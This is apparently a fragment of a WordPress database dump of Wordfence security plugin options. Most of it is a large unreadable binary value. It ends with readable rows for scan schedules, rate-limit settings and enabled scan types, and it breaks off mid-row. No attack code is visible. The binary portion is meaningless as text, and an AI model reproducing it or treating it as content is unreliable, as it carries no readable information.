���q��z�P\'=�C��C��&���d��L�����e��Bx\0��y=��T�^B���7�ѫ�������?#��_�O�_h��_@x�&}czSZ���Nz���-�-�^�7Z��7{��o����z��Iz�G&�����ǘ�k������@���H������P0}t�!}���X}\"ɀ>eRD����\\_O��A�5�D�;3M��XL��С��t�\':��:b�C:�f���{�����њ:t��k:z�:�@�D���\rt,چN,5��-�Db$�H\'�T����t��I:�C�.U�i{�_>t�~\'��~��xD�3(�t&@g�l���>�ً:�Y\r�[I�1��]t1@��?C����t���dm�/�}�/�EЗ���K�^���E�J�W���f�j�\'C�\n�PK�`�u��b�jc��#�Z�n�f� c�E�z�\\�v�j��	.C\'@��=����1t\'����5*��?�N0vDE2v�_�ػ�+c���ax͆a�bJ��}�w�C����f����X���Q��3����g�#�#��G4GR60�,2���O��Yo�s�?Ù��p9��pI>�p)��8.|�p+�3�P���\r�n�G7�q�5�q����y���څ`xeex=���0NO g`/~����������\0#P�d eY�f�{��8_2�)ud\\���t�#TNc\\s~θ�NfD�3\"��He7�zQ3#ʣ�c�Ĉm�0�\Z��ڌ�5��{�ɥ�)�9�T����3��5�Nw}�w���9]���{���݌���|�FѼ\n���x�\0�x����Fپ��2����\'�bŨ���QqgT��3�=�3jgԌ%2ju���׌GT�u��\'�>3�jE1\Z�[MZWMM0F�@Fs���{��od4c�͂�������nƻ]?�r���������8{F[��=����%�#�����p*��\0�腕1�5�1�2�\0��c���1y�1t��v�ι�~��1�1�_�}��1��%c\\K��80>�j3>�M1��_�_�ɖF��q�8�1����g�X��\0���\0��e��g2�H�%p�w��@n��@=00��20܍,`�\'1p���[���|�A��0(7t4m!�v��Và�N0��*�ܕ��FbpLZ@�;���|a��c�\rR�1���!�P�P�f,F82�f+ϲ+�g�/�L�OG��n1U/�0U�0U�fL���LuX s��~��#0s�x\'S�D���e��dnn<�ܲ~���ٌ�?p�����ܭ���g�s����+�~�\Z�=���ML��A�AX�t����i�\rg��ҙ��3�G3�N2-��1�sL�w�m��-I�iw��>~=�>w�i_��yd��h����1��k0�K�1�,3��72]�73ݞ�c�[�2O(T���*L��ϝG��!טgT�g0UL�){�Y=3�Y�f@�>3���y�Ƽ�e��?��Kd�[���G�1�i@f���r�?���W-��W�.1�b1��`F�\"�ћ�1�c[�љư��7k��i\nf��f��3A�ļ���<:�L�af��c�1��̾S��ny�̆�ي?�\\q83�X&3����\'��,R�b9w2�<f>�$1K<��R�5f�m�J�Cf��:��}�ZӉYS�Ŭ)^b�o`�~1낿1?��|r�����w���0�l�/g>�z�|�w�)��|�e;���l�$0�<�`�=Bg�~Kb�_�`�<��}f~8�������T\r�����{��ٯy�9�*�9|��;ǜx����<�9�w�9��b��1��t+��Ek��|�c\"s>}�9�g���)g��� �(&��	��΄�1��wL8�#!�0q�<&��;&� �I��$�{2��\'�D��II�3�晴�d&\r c�`�L�8���?2����LNe�C����gr�\'���0����)��)[e”�`�Z2����!sE��������R���Z�=��������y���ֲ�/6����Y:�V,��X�t3��,o�&c$kS�kS���Y�Omf������:`q�e2��u0��e�²�}�uH}�uH+�e��`��Y��j,[�!��œej�H�k�������rz�r\"�Y�YS,g\Z��R7�r!N���س�y�r�?�r�g��Y����S1ˬS#,������}�\0�̵�,��&���V@�+��9D\Z��UVH�\'+$;�R7Ⱥ�4ͺ4��\n_�e]�9NJ��eE�6���Ċ�n`E�W����n�5b�ܙ̺�����\\Š�?`ſy͊_4b��^e%f�`%5�X�~լ��qVJ�YV*(���8��~���i���,�be	�����Y�sY9m�������T+���в�U8_�z��;�t�=V��lVe�wV�[{V���U5��U��2��`�:*X��o��\Z���\0X�����92��O�ӒU���q����)����	��~���1��w\r�kW���7�I��O�Xo�_X��W���S���dV�\"��ի����>f��c�U(Y}ʝ��k���+;X���Y���q�^����/-�o��X߈6��7Xӎ�XӤ������8]֏�W���X֯�e��UP�\\Hkn&������5�\re�G|d-��g-LZ�\0�;Y��,�\0��~��d�i�,h�~��XY`���P�7X�Y�3�E�������`��,r�\r%ˢn!��\"m+v�����M��^�X�{WX\\�q�\ZKP��%��%r-g��.�d\nM�\\k\'K����4Dz7��3��,�YK��r�/[�t{U��:^�V�a���ׄ���q�\ZZcl��R�Ƴ`�Z��ډ9��W2{��m��ԇ������t`�&M�7�leo��go����Ϛcoߴ��������m`��6(>�6薲��&���:��������؆��l�,&�@�2��T�6)+b�Ta��D�;�f���e�ζ�/e[E[��b�����`ۘu�m��l�p=�]\"�md��HdMub;>e;�R�N&l\'�9�ٶ�}ܸ�}Be��OLe�Ą�=��ا��l��*�w�;���>�/��j���*�\\�_�y�L���z���{��E��!���K�v(�;�e;|����:�J�?���$;\"œQǾzx�}m��ڿ3�H���h�/���ɎI�c�|mf�뫳Kٷ�؉����^vꛭ��0v��v&��}Gr�}gy��e���}q���Kb��a�wO��\"��@vj��x���IvѬ��O1���W��3��+���Y�\nO/v�	sv��zv�t-����p�~8\nc?�a?r�e?�hd?�a?�7b?��~����t�;v�-5���^�gI���즵f���K�H�����Wv;دg^�[�?�[��o�*�o�߱[#�mH}vG.��]�����������7re�3��O6;��.��!\'���!���\\���{��Q�t�)��M�lZ7{�%��k�,{�r�=�}����+�o��\rx�����۰�?N��;��P�6��Fl�����HJ>���F߹��\n�x�q6�C�M6�d�r���\rl�%����^~���S�܄&6���-�hc�%���\n��le�4{i���$��^9���2y����G}�g����գ�8\Z���k�8kՇ8�qֽt嬏dp��8��\"���\n��6�ު���*g+(���%g��g�m.gІ��~��W��cT��c�{����*%�\Z�s0;�spv��m�c�Õca;ȱ��ϱ|~�c�c�>�9,{ȱ�Pʱ1����slW�8vDz8vi�<���_�c]/�x�s���&ǥ™s|\"�s��-��$�㖚�q����B=�x���x�q|,9�>�8��Μ3�8g�9~&f����l�l�9N��vN�	}Np�n�9����\'�f��!(\'I�\\��Ź\\�͹�ʑsE3���\\��\\MZÉ�l���snf97=���/rn���Ā�9�í��Ċ͜d�=���;��5DN��\'�l\'�d\'��mN�,�ݱ�=�d�}|\'��]N�`\'Gt��_�)�_�)����b8E½�^}�Ev������<�ȩxy���&��0>�S�{�S��SgVǩN�<Z.�<Y-��k��4X��4��q���q^q���9M\r��6I�W�78�\r�8-�\'9mW\"9mm�v�`N�ԓ����_�z�}��X�9=/�9��ɜ~��O�X�׏�������J�pWgtl+gl#�3�{�3>;ę�!p&x�7]\Z�,�3�™�~Ιn��L9ę�L�̐��ٶ`�w�?��8�O���_Ŧ���9������uO9��G8�w�9���8�� ��A��]8-�`^rp��y�ou��\Zb�9�l[ˡ�94}mp�y�+�9z��\Z��p�8�!�@�!GP��`�9š�8�G�W�#�ȑ r92���ش�����w�\Z�F�]eB�Vr���\rs׭��]�o���Ӈ�����ں��ur���c��sg��	���s���Zd��סp�͒�����J��#6ܽ��\\C\r�!��5\\��\Z���\Z�sM֌sMX@���A���3״�(�t��k�j�5SFrQ��Vi�Vm��V|׮�u0��uȺ�u��纆�p]��q݊�q�#�����K&\\��o����Z��֋`P�\rB�q�k��sy���P��X��d�#��КC��FKn(6����Ↄ��+g�p�4p�M�Eܫ)xn��7nԫ��h����+���7�\'rc���X�,7��6�-.�{��M<+�&�}��+׹i�<n��7��9n:Ǔ��5�fl5���\\���r�[Z��3���n��in�J7���_��-:V�-��rH0�b���/�[~�<��\\>��I����>:��}���d#���1��T��P��mX��6��6Rm��)��M�ܦC-�W�+�w��VV4�=m������,��˚ە����%q$R�`.�;2�����Y]����!����;Q��;��zņ;	��~s��ΘjqgMqg	�٥���?\"�?\"M�?w���Z���K���΁;_t�;�SpN������s�]>\\ ���UゑH.�~��w���p�K_��$.�ћ�TTr1�F.>:�Kt��%��d�.��.���eq���~.�w�����\rjs���\\��%��W\"s�J7K����\\��^��rW��P��ZOe�3o�O��U�ڴ	o��r���K�5��<���<\r�=�Z�!o�j?O+�.O������t��x�bosJ:O�Io�o��L�v�������g�����֗����];�3ܾ�g(���w\'��?�\rϨM�g���3i]�;�)����;�(�w��+���g�.�g�\'�g�oų�`ϳ�cij�e�<�<���y��~��nz���򎼊�9��9&i��M�V����yNh �i)���s�r��2��`m�y��x\'�y\'75�<��*��|_��|������m%�9�.��.Y#y���ya���˜m�+��yWi�x��y��Kx1�?�bd����5�X�w�/��\n�U:���x�����+f���^�^0/u�/\r<�ˠy�2��xw^��y�����xY�xY��y9Iq��ͺ���r^b/�p�^�퇼b�\Z^��;^�����+۝�+��c\nx�^Ż*^��+�҆˫�ȫ&���o�����I���:�����y\r\'�x\rm;y\rދ#R��K�&����#��i����Q^������t��1$�u^*�}�g�p.�����׃$�>��>1My�\"x>_x%��Ag��F�`�&ox��7S����A���{�/���&�Px�B�y��wy��`��\'9o���m�/�����9|1�O�\r�B�o���W+��w1�PA�\0�y�P���A<P�V�f\0�˙E���zHz�~zb+�z��G��1�l�1��ط�y�=v<N�/c�����.�y�͑<~HO��O�Z��$�D�\r<�AO��Sh�y\n1������x�o�eoQ,᭔y�UvY�U>��*b_���w|U-_����_�9��k��5ͪ���T��6.�ׇ�lN�78M�Ê��F�������[7�o�B��t���e���4��]��߃���w�o�q��_^�?�j�?�ŋ\0�`��7���M|��\'|S��|�*m|�ߥ|�<��5��2���v�����l��|g��%r����wKQ��f�=�Z�=�\'���O2n�OJ��O��򽍳�މR������\Z#~\0Џ�1�ʾ�?��1������+��������/m�ſ�O�z��*��6�_N��_���Gl��G�n�_�������\0�z�~Lc-?v��ۼ�;\"�Ǣ���Q�����1~bu5?鮂��������;��K\"~�?��m��EY;��t�����p��M�+<���9~�*\Z��q#�Qt�Ij�)F�o���7NJ��ҷ�,���[L�/����Z濾���\Z��c�����d�����o_�w���w�z������L��w���{՗���h~��&�ȳ �h�c��<�?������O�}��N�ɟ~RşM����	���*�N����p��ҋ�r� ��|Г>��5>tM	Z��CQ�pB\r�����c�_�c��X��|l���]�\'�1�E�I�����|�<�Ϡ�O�|�e>�=�5���Ս��C_��|�_#���@��e�j�L�V�.Xsy�`͓�����-kwi�>�].h�\n��U�u;=�>k\n�[\n�\\��ͮo[��l�~/�J�#��!�g��٦\n��}��)�j\"	v���.�	vwi���W��\n�&\ns��>�����z�	LO�L�����Z���.�yA��\\�$�x�K`����������)�^�,��(����Xl9�Y��vZ�uN�j\'p���nu���\\m�7����{���G�8#��N]x-8�Z�Ţ�a��ϛ7��\r��kA�K]A`]��ܱ(����z�o)�_\\���\nB�B``A�#��(տ%�w@p��KpU�Yp����zt� z�����AL�� F�)���~���	R��R_CiN:��`;A�c� �Q� � S�&�S�*�{��nA���<A�a��@#BP~{��2㨠ƷJP�U*���<��<���/H\rvY���P�3U����1sA�v�+�Z��}�WvF��	��m����jA�%A�G���$hoLt�)t>�	�cmnh>>\nz��z�}=�F���:A�(D��z(LhU��]_�*U�%��\n��	�.���1_����`r�`Rj\"���(��.��!K��,H�K�I0�wF\0�\n�iW�;&(+��`O�p�a�yI\0��+@:����U���;�+\'�\Z��d�C@^�-� &Է�4C��fW\'`��X��	�!>v�U��X )},�f�t,���%�F��G,9,k�	Vc�j��ժV՞�\nպ�B�3k��ᗄ�Q�\r^p����B�}.\'�z����z�����;;�����}�=�B#�o��LCh��Qh\"�\"4\r+��͓M�_3�V�	B57�\r�[h�Q&�_�:n�&<�s��l����i��9�	�X�B��d���q�L$<q{Vx� <�f.<��z��>zzB�3��8��t�f��9ᙸ|aPՈ��aHA��b6Oxq.Yx��0̵^n�&�<�*��^w^G���\'�Q\07avLxC����Kga̾ta̩��X�,a�}¤��䶫�dn�0��#L�R.L�{+�x�,�b\"�{�JxO7_x�K(̆���掯毬DE	�l$¢w>��hka�I��4�BXͽ/��֢ͅ��[º\r�u:@a~DX\'�*|��)|��6�c�ϫ�_��F\n��U�M��—��Wy�Vc��}f���麰mz��}[��=x���6\\��\"�)����W?�tl��#*X��R8GG����C���;�T�p��*�q�(�����?���i�>N��k)���\n�������ݝ!�8&>&�Z���	���(A���$�l&1	6��#�:)��k��D�y!�ꀐ|�Z�h|\"dm�����.!��Q�`�k���W(���\'\n�N�B�]���)����~�ʿ�\n+KB�p��g��\0�\"�N�tjT���W�,��e��u��rE��}Y��F�h-�h-eQ�>-��i[�tdS�M�lі#��-+q�����{ 2��Ut0�GdֶUd����ZthS������8��W��\'�D�9�\"{�-��N��א�-Lt��)rz*r�Q���Ɗ\\w��\\�D��9\"W�e�[���]���C�Etj����?��G�7�V�M�N��(��K��(:�#:;��<�����?D�n������)]H@�.�.���%�PZ�/�ܻF�qTA�$��N����];T#�vU!�4�-�2|!��Eg鈢q�D76��n���n�Eqt�(�G�(q!J�z)Jv���Ê2�2�=\\���(;fT��h�(���(�,*tM�D��D���R닢R��Ҷ�ҟ���h5Q���r=���ל��=)���OT}>_T��=L? �M.��=YZ��=u����h�^ly#zQ��<���+�+9+z�}\"j=^\"jm>&z�m�͚��3�E^ˢ.�\r�.��n@��G�]��-�?�!�w��>==\'�D9/\Z<�\rm<-\Z._\r���ƪtE_���ɣ<�d|�蛱��� �v䈦=D��A��ߢ����`�hna\\4�;-��,G���F�o�LE���\"pP�~A.�\'��\rX:�%��a�uD����^D\\�\'\"}�&\"?�ћ�DLK��u�IĶ9!���6{�x�n�L�H��	8a\"ɟt��i@$-RL׊����U���U�S�Um�ū~���9�U5�Ī�qb�\0��3\'���5;��\Z�z�Z���F�xC�w�n|�xc�Q���m�;�[������;�Ļ�ĻmO�\r��_{Vl���+����b��Cb�Sqb���b���b�z���g�-�Bl�)�;՟;��+v���O�<�,�#�S�]���4q�g�8��J\\�.����ig�CDc���/?_J9!��C|���[��y�Aq�_�������2A�J&���\'����o���o�u�Is��$C���$NNM\'?8,N��Z��_�\"-�%�S���i���;�6�eBq�^�8/tX���C\\xIM� \"I\\�k����KhqهNq#�88$��; ��tY\\9e+�rŋk>l׽x-~\\�^\\��U\\O~+~�:)~�$7Ԕ�H��^���g���l���f��⦅O�f�qsL���qW�+����Y8q˶_�+��o���j��������;J�;���~��}Uq��Mq�琸���xp6Y<�.W��[���\'��_4�\'�k�_�O�\\O�\\O��g�G����Ŀ�<ĿWΊ�m��+�¾1ШF��C�����HR�]�J��~V����\Z�D�!1y{��ܳY��Yw%bVI�>!f�͋E��)�;�ŋ�|��I�{R��U+^�JT~LIVGI46�K4\r�J�d�p�D��D��dS��d�Q7ɖ�A=A�D�c�d��k�]��-C�A�>�ނ\n���}Yc#Vbz@ ��Y+�LN�X-\\�.CJl\Z]$6�L$�׏Hl��Kl�.I��7I�Ӓ���%�|��eq��u����i���S���s�I[K�gk��+k��瘣�]�$��@8��ߑ}*	�2��ؒib��C��L��\"k�$�\nQr-�Y�Qrf+��2-���$���&�Y�Y�-����*aIn��Hn�hH��~���$飫%�M�;��;ѯ$���Hrn.Jr\'$yF����.I�QSI��I��Iak���P.)n��wHJ��%oK*=�I*r$U}a��Վ��8I��D�D��fܓԥa$u�ڒ��I������:�䉞���8V���#y�攤�<T��� i]AI���N���{���G�)�-N��s%��$H�Va%c�%���d�K2��d2�E2��d���{��dn9T���wo�@�YJ��=8�J�jBH0\'%��*	�5VB:�EB\Z_���%�c�J�r뎄:�!���HHXׯJ���JD�?$b�i��ݨD2a+�7�J�$��p�źC��]֒�Cw%����U�M�U���U�T5�@�f\'U�}�j@�H�J�.�H�YK��^�ͷ~I���I�`̥ۦ	RN�tOv�԰\"Uz��/5�&w��&��RӧR�ن�R����վ���w��X���Bz:/u��&u\"�J��K��Б��K��W�\'��^��ϸ���/��G��#��u����U�Ҡэ�sQ!��}��!�I/UKÃ�H#���W}�W���k����u��p�F_9*�騔�LђƉf��7B�	M҄n�-/�&u�m�`�m�.���$��Ҕ�\\iʋjijb�4mRW��%M��-ͼ�NzǧWz7��I�4��Yz�Vi^}�4�{��薕�xs�����_ZڰNZއ�V�H+wOK+[J�,ӥU�)Ҫ7����ZҚ��҇�\r�:�Fi�O����Y��x��11G��%}�J�u+����H�\'�H��I��K_�aK�W�H�?����r���^���,���dH[x��G��$Ki�k�V�:iG�giǭ`i\'�W��p_�}�R��M��7�@��B���]��?�GoHjZ���ҡG:ҡA�t�p�tD0-���~��.�V,��,C�����tP�k���ۼ�W���]�`=%]�H���J1Rȵ�R`I\n@H��P)�E��E���jt�X�)6e�w�,�_����I	�\")��;)�3XJM;\"�V��R�:���o�!_��\0H��R�F��Ӓ��\"�oR�	]*�Ke7\r�ʄ5ҥG�KP����)�Z�l�Cٚ\r��u�e�\"�d����æe��2��/�\r�d��2�e��v2��2�@�l����;2}�q�>r����o�T!3L��&_�N6�1�e�o��+ 2�u�2#���<Vv�n�̴�+3;�!3�3\'�H0�Y����z]vh���J��0AOf_�/�_ˎ�\'e�2�W)2�[Q2�ޏ2W�n����[9W��-���T7���/�y� ;ů�����|ZO�|���3����52�ɲ@�bY�|��\\X�����͏d�S�e��h�+�Q�+HGYk��*��\"Rvm�^ٵ�����e����Ȧ<Y䈁,:��,:��,�(�%��ݚ|,�\r~&Kl˒ԣd)�e�������;�,��\r��,�Yֻ]������!Y.2L�W��#�e<dųBY��HV��IV:�%+��)��\\(��{KV��$��,��\\�j�Kd���=l���n��re��N��Ų�?����rY��;�g��d�z2d/=�^5��^�e���eo�Y�6k����FY��eY;�)�d��z�7�z�1����eU�\0\"L6��I6�&��}�֔}[̓MUȦiWd��u�YX�l�Ô���E��k���n���D���雲?�ò�b�_\r������� �ɐ��d��{e(?C��M��W�p7;d����NF�+#>���U/����d�p͢FFÒdt�z�8C�Z�#c��+c1��8;d@���Q(pjd���e\"k[��U�L��Q&�J��/�ʔ\re�jt��mٿ|3ٿ�;r�A�|�G��`�|���|MN�|�\\�n����u����w�ɵ�dr��A����\\\\���|��q�4L�c�|�`�|��\\�wPMn�#��,߿n��\0���<Vn�G[n�=Wn��/7���<�+7�~Gn֝-?�l\"�\\;+���,�2�[\'��o������?�#?�~[~�6M�P�\\�@���l�Q����?˝N4ȝ�F��^�O�j�OH��=7��=�\n�&f�>�<�χP��r��&r_�g�Y�X\\ȗ���+�TxF� C����_�)���I�Gj��on��<a ��ԓ�T��qE�����:�<�g���A���J�$��\'���S~?��@�����S���ۣ�yIpy�K�<o�D^��,/��G�K���K+��ҡ!y��:�O�ȳY�8��I��k��!�Y�ZP�y_��U��m\nY��X ױ oe�����m.��v׃��fy���C)����;+;����n����Y�A�Z�a�I��}�|���|��S>*!�Ǣ��c?��/��ɿ��Ol��O�˿�ȧR�g�G�g�nȿ�u������ݑ�AS��b���	\\�ה*^� ��Tɡemr褳��$��J��1r�~��p^�zC��_��cw1�X��w�Д��l���R&\'ѳ��\0;9u&g�N�3�l��<�9Z29/맜�a��7œ���\"��HT,�����	��5\'���K���w���˗����D�J��|�v�B��C�20�X�Y�6�U�o>�P?��X�q�B�8D�a��b�D�ic�bK-X���K��}H�-�b\"I�36S��0M�{U��,]�絧��}D�/o�bߧ����\n����N������K��H���{Ta��Ha�Q��=ܧ�=械ߴ�p�R�p�)���pR��p�5Vx�7+<�9��C^>�\n/?m��p�¯�C�ﭦ�*�^sT�y�@<S�nU};��g)΋r�).�G*B+S�bEx���2�Vq�cJqe(Xq���\"�n��Fq�\"v�@����7lR���Yq�r��v��\"�q@�t�\"��\"EU�H�>Td\0���)��R��~T�̄*r34��ˊ���k����]Q�IWQn��(�)��*�G����^C�J�\"Eef���u��ꨨn������x���󮢱^K�챢�l�⥎��U�M�k3����׍�-$�����{o[E[t��3?N���蚹��ި��p�W�#�S��*>��+���(jl�����)��bt��bl����}�dزb���y���ի��wV��=����\0��T\0\Z�\n��\Zb�@�R O)PK�x��\n�6a�\n\"篂**�)k|���~��Fg*����]�k�V�\n�B�;�PޥP��R(f��3j���\0Ŋ�7�J#M�RP�\\u%^�j��T��+�w�+�]t��^���D��a�\\czN��3N��S���S��أ\\�5�Ԣ?U��W�5+u�Օ����=+7��Qnn�Pn�LVn�JW��v\\��ոr�TO��v����_��OJC�r��K�>-�r���rߵ*�����8���� \r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J	�����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B	����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;΢��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU�	/\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|��	��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo�	�=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\	tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x	����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#��	c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S؅�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��)	_+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X-	+NH⑋�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�޺ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','1','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:3:{i:0;i:1629757800;i:1;i:1630017000;i:2;i:1630276200;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','skipped','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1629498600','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\